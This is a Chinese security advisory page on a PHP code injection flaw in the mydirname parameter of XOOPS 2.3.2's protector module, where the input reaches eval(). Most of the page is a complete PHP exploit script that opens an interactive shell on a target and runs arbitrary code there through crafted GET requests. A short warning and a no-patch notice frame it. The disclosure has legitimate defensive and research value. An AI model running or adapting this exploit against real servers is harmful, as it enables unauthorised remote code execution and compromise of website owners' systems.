安全研究
安全漏洞
XOOPS mydirname参数多个PHP代码注入漏洞
发布日期:2009-01-08
更新日期:2009-01-12
受影响系统:
Xoops Xoops 2.3.2描述:
BUGTRAQ ID: 33176
Xoops是非常流行的动态web内容管理系统,用面向对象的PHP编写。
Xoops的xoops_lib/modules/protector/oninstall.php、xoops_lib/modules/protector/onupdate.php、xoops_lib/modules/protector/notification.php和xoops_lib/modules/protector/onuninstall.php没有正确地过滤对mydirname参数的输入便在eval()语句中使用,远程攻击者可以通过提交恶意请求注入并执行任意PHP代码。成功攻击要求打开了register_globals。
<*来源:athos (staker@hotmail.it)
链接:http://secunia.com/advisories/33435/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?php
/****************************************************************
* XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit *
* by athos - staker[at]hotmail[dot]it *
* http://xoops.org *
* *
* thanks to s3rg3770 and The:Paradox *
* *
* works with register globals on *
* note: this vuln is a remote php code execution *
* *
* Directory (xoops_lib/modules/protector/) *
* onupdate.php?mydirname=a(){} [PHP CODE] function v *
* oninstall.php?mydirname=a(){} [PHP CODE] function v *
* notification.php?mydirname=a(){} [PHP CODE] function v *
****************************************************************/
error_reporting(0);
list($cli,$host,$path,$num) = $argv;
if ($argc != 4) {
print "\n+--------------------------------------------------------------+\n";
print "\r| XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit |\n";
print "\r+--------------------------------------------------------------+\n";
print "\rby athos - staker[at]hotmail[dot]it / http://xoops.org\n";
print "\rUsage: php xpl.php [host] [path]\n\n";
print "\rhost + localhost\n";
print "\rpath + /XOOPS\n";
exit;
}
exploit();
function exploit() {
global $num;
if ($num > 3) {
die("\n$num isn't a valid option\n");
}
else {
yeat_shell();
}
}
function yeat_shell() {
while (1) {
echo "yeat[php-shell]~$: ";
$exec = stripslashes(trim(fgets(STDIN)));
if (preg_match('/^(exit|--exit|quit|--quit)$/i',$exec)) die("\nExited\n");
if (preg_match('/^(help|--help)$/i',$exec)) echo("\nExample: uname -a\n");
if (preg_match('/^(about|--about)$/i',$exec)) echo("\nstaker[at]hotmail[dot]it\n");
print data_exec($exec);
}
}
function data_exec($exec) {
global $host,$path,$num;
if ($num == 1) {
$urlex = "/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}";
}
if ($num == 2) {
$urlex = "/xoops_lib/modules/protector/notification.php?mydirname=a(){}";
}
if ($num == 3) {
$urlex = "/xoops_lib/modules/protector/oninstall.php?mydirname=a(){}";
}
$exec = urlencode($exec);
$data .= "GET /{$path}/{$urlex}{$exec}function%20v HTTP/1.1\r\n";
$data .= "Host: {$host}\r\n";
$data .= "User-Agent: Lynx (textmode)\r\n";
$data .= "Connection: close\r\n\r\n";
$html = data_send ($host,$data);
return $html;
}
function data_send ($host,$data) {
if (!$sock = @fsockopen($host,80)) {
die("Connection refused,try again!\n");
} fputs($sock,$data);
while (!feof($sock)) { $html .= fgets($sock); }
fclose($sock);
return $html;
}
建议:
厂商补丁:
Xoops
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://xoops.sourceforge.net/
浏览次数:3569
严重程度:0(网友投票)
绿盟科技给您安全的保障